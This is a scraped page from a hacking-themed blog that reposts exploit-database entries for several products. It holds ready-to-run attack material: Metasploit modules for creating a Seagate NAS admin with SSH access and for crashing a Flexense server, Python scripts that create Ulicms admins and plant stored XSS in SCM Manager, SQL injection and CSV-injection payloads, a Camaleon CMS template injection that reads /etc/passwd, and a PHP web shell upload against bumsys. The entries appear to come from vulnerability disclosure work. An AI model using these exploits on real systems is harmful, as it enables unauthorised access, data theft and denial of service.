    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://filmora.wondershare.com # Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE # Version: Filmora 12 ( Build 1.0.0.7) # Tested on: Windows 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31747 Vulnerability description: Filmora is a professional video editing software. Wondershare NativePush Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The service name "NativePushService" was vulnerable to unquoted service paths vulnerability which led to full local privilege escalation in the affected window operating system as the service "NativePushService" was running with system privilege that the local user has write access to the directory where the service is located. Effectively, the local user is able to elevate to local admin upon successfully replacing the affected executable. C:\sc qc NativePushService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F HNINKAYTHAYAR\HninKayThayar:(ID)F
  18. HireHackking

    Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit) # Date: Dec 9 2019 # Exploit Author: Ege Balci # Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/ # Version: 2015.0916 # CVE : 2020-6627 # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/http' require 'net/ssh' require 'net/ssh/command_stream' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Seagate Central External NAS Arbitrary User Creation", 'Description' => %q{ This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state and register a new admin user which is capable of SSH access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ege Balcı <egebalci@pm.me>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'], ['CVE', '2020-6627'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['unix'], 'Arch' => [ARCH_CMD], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, 'Targets' => [ ['Auto', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ], ], 'Privileged' => true, 'DisclosureDate' => "Dec 9 2019", 'DefaultTarget' => 0 )) register_options( [ OptString.new('USER', [ true, 'Seagate Central SSH user', '']), OptString.new('PASS', [ true, 'Seagate Central SSH user password', '']) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } },60) if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916') Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit # First get current state first_state=get_state() if first_state print_status("Current device state: #{first_state['state']}") else return end if first_state['state'] != 'start' # Set new start state first_state['state'] = 'start' res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'), 'ctype' => 'application/x-www-form-urlencoded', 'data' => "info=#{first_state.to_json}" },60) changed_state=get_state() if changed_state && changed_state['state'] == 'start' print_good("State successfully changed !") else print_error("Could not change device state") return end end name = Rex::Text.rand_name_male user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}" pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8) print_status('Creating new admin user...') print_status("User: #{user}") print_status("Pass: #{pass}") # Add new admin user res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"), 'ctype' => 'application/x-www-form-urlencoded', 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }, 'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1} },60) conn = do_login(user,pass) if conn print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})") handler(conn.lsock) end end def do_login(user, pass) factory = ssh_socket_factory opts = { :auth_methods => ['password', 'keyboard-interactive'], :port => 22, :use_agent => false, :config => false, :password => pass, :proxy => factory, :non_interactive => true, :verify_host_key => :never } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end rescue Rex::ConnectionError fail_with Failure::Unreachable, 'Connection failed' rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end return nil end def get_state res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } },60) if res && (res.code == 200 ||res.code == 100) return res.get_json_document end res = nil end end
  19. HireHackking

    Ulicms 2023.1 - create admin user via mass assignment

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Ulicms 2023.1 - create admin user via mass assignment #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: create admin user via mass assignment #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna import requests new_name=input("name: ") new_email=input("email: ") new_pass=input("password: ") url = "http://localhost/dist/admin/index.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Request is success and created new admin account") else: print("Request is failure.!!") #POC video : https://youtu.be/SCkRJzJ0FVk
  20. HireHackking

    SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python3 # Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) # Google Dork: intitle:"SCM Manager" intext:1.60 # Date: 05-25-2023 # Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829) # Vendor Homepage: https://scm-manager.org/ # Software Link: https://scm-manager.org/docs/1.x/en/getting-started/ # Version: 1.2 <= 1.60 # Tested on: Debian based # CVE: CVE-2023-33829 # Modules import requests import argparse import sys # Main menu parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit') parser.add_argument("-u", "--user", help="Admin user or user with write permissions") parser.add_argument("-p", "--password", help="password of the user") args = parser.parse_args() # Credentials user = sys.argv[2] password = sys.argv[4] # Global Variables main_url = "http://localhost:8080/scm" # Change URL if its necessary auth_url = main_url + "/api/rest/authentication/login.json" users = main_url + "/api/rest/users.json" groups = main_url + "/api/rest/groups.json" repos = main_url + "/api/rest/repositories.json" # Create a session session = requests.Session() # Credentials to send post_data={ 'username': user, # change if you have any other user with write permissions 'password': password # change if you have any other user with write permissions } r = session.post(auth_url, data=post_data) if r.status_code == 200: print("[+] Authentication successfully") else: print("[-] Failed to authenticate") sys.exit(1) new_user={ "name": "newUser", "displayName": "<img src=x onerror=alert('XSS')>", "mail": "", "password": "", "admin": False, "active": True, "type": "xml" } create_user = session.post(users, json=new_user) print("[+] User with XSS Payload created") new_group={ "name": "newGroup", "description": "<img src=x onerror=alert('XSS')>", "type": "xml" } create_group = session.post(groups, json=new_group) print("[+] Group with XSS Payload created") new_repo={ "name": "newRepo", "type": "svn", "contact": "", "description": "<img src=x onerror=alert('XSS')>", "public": False } create_repo = session.post(repos, json=new_repo) print("[+] Repository with XSS Payload created")
  21. HireHackking

    Rukovoditel 3.3.1 - CSV injection

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account ) step 3. Set Firstname as =calc|a!z| step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1) payload: =calc|a!z|
  22. HireHackking

    SCRMS 2023-05-27 1.0 - Multiple SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 05.27.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `email` parameter appears to be vulnerable to SQL injection attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can easily steal all users and their passwords for access to the system. Even if they are strongly encrypted this will get some time, but this is not a problem for an attacker to decrypt if, if they are not enough strongly encrypted. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html) ## Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  23. HireHackking

    Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI) Exploit Author: PARAG BAGUL CVE: CVE-2023-30145 ## Description Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter. ## Affected Component All versions below 2.7.0 are affected. ## Author Parag Bagul ## Steps to Reproduce 1. Open the target URL: `https://target.com/admin/media/upload` 2. Upload any file and intercept the request. 3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`. 4. Check the response. It should return the multiplication of 77 with the message "File format not allowed (dqopi49vuuvm)". ##Detection: #Request: POST /admin/media/upload?actions=false HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.com/admin/profile/edit X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------327175120238370517612522354688 Content-Length: 1200 Origin: http://target.com DNT: 1 Connection: close Cookie: cookie -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="file_upload"; filename="test.txt" Content-Type: text/plain test -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="versions" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="thumb_size" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="formats" test<%= 7*7 %>test -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="media_formats" image -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="dimension" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="private" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="folder" / -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="skip_auto_crop" true -----------------------------327175120238370517612522354688-- #Response: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK Cache-Control: max-age=0, private, must-revalidate Set-Cookie: cookie Content-Length: 41 File format not allowed (test49test) #Exploitation: To execute a command, add the following payload: testqopi<%= File.open('/etc/passwd').read %>fdtest Request: POST /admin/media/upload?actions=true HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.com/admin/media X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------104219633614133026962934729021 Content-Length: 1237 Origin: http://target.com DNT: 1 Connection: close Cookie: cookie -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="file_upload"; filename="test.txt" Content-Type: text/plain test -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="versions" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="thumb_size" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="formats" dqopi<%= File.open('/etc/passwd').read %>fdfdsf -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="media_formats" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="dimension" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="private" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="folder" / -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="skip_auto_crop" true -----------------------------104219633614133026962934729021-- Response: Response: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK Set-Cookie: cookie Content-Length: 1816 File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin fdfdsf)
  24. HireHackking

    unilogies/bumsys v1.0.3 beta - Unrestricted File Upload

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload Google Dork : NA Date: 19-01-2023 Exploit Author: AFFAN AHMED Vendor Homepage: https://github.com/unilogies/bumsys Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip Version: 1.0.3-beta Tested on: Windows 11, XAMPP-8.2.0 CVE : CVE-2023-0455 ================================ Steps_TO_Reproduce ================================ - Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/) - Click on action button to edit the Profile - Click on select logo button to upload the image - Intercept the POST Request and do the below changes . ================================================================ Burpsuite-Request ================================================================ POST /xhr/?module=settings&page=updateShop HTTP/1.1 Host: demo.bumsys.org Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7 Content-Length: 1280 Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99" X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA Accept: */* X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.bumsys.org Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.bumsys.org/settings/shop-list/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopName" TEST ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopAddress" test ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopCity" testcity ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopState" teststate ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopPostalCode" 700056 ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopCountry" testIND ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopPhone" 895623122 ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopEmail" test@gmail.com ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopInvoiceFooter" ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php" Content-Type: image/png <?php echo system($_REQUEST['dx']); ?> ==================================================================================== Burpsuite-Response ==================================================================================== HTTP/1.1 200 OK Date: Thu, 19 Jan 2023 07:14:26 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips X-Powered-By: PHP/7.0.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65 <div class='alert alert-success'>Shop successfully updated.</div> ==================================================================================== VIDEO-POC : https://youtu.be/nwxIoSlyllQ
  25. HireHackking

    Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit) # Date: 2018-03-09 # Exploit Author: Ege Balci # Vendor Homepage: https://www.flexense.com/downloads.html # Version: <= 10.6.24 # CVE : CVE-2018-8065 # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Flexense HTTP Server Denial Of Service', 'Description' => %q{ This module triggers a Denial of Service vulnerability in the Flexense HTTP server. Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. }, 'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-8065'], [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], ], 'DisclosureDate' => '2018-03-09')) register_options( [ Opt::RPORT(80), OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]), OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ]) ]) end def check begin connect sock.put("GET / HTTP/1.0\r\n\r\n") res = sock.get if res and res.include? 'Flexense HTTP Server v10.6.24' Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end rescue Rex::ConnectionRefused print_error("Target refused the connection") Exploit::CheckCode::Unknown rescue print_error("Target did not respond to HTTP request") Exploit::CheckCode::Unknown end end def run unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end size = datastore['PacketSize'].to_i print_status("Starting with packets of #{size}-byte strings") count = 0 loop do payload = "" payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n" payload << "Host: 127.0.0.1\r\n" payload << "Accept: "+('A' * size)+"\r\n" payload << "\r\n\r\n" begin connect sock.put(payload) disconnect count += 1 break if count==datastore['PacketCount'] rescue ::Rex::InvalidDestination print_error('Invalid destination! Continuing...') rescue ::Rex::ConnectionTimeout print_error('Connection timeout! Continuing...') rescue ::Errno::ECONNRESET print_error('Connection reset! Continuing...') rescue ::Rex::ConnectionRefused print_good("DoS successful after #{count} packets with #{size}-byte headers") return true end end print_error("DoS failed after #{count} packets of #{size}-byte strings") end end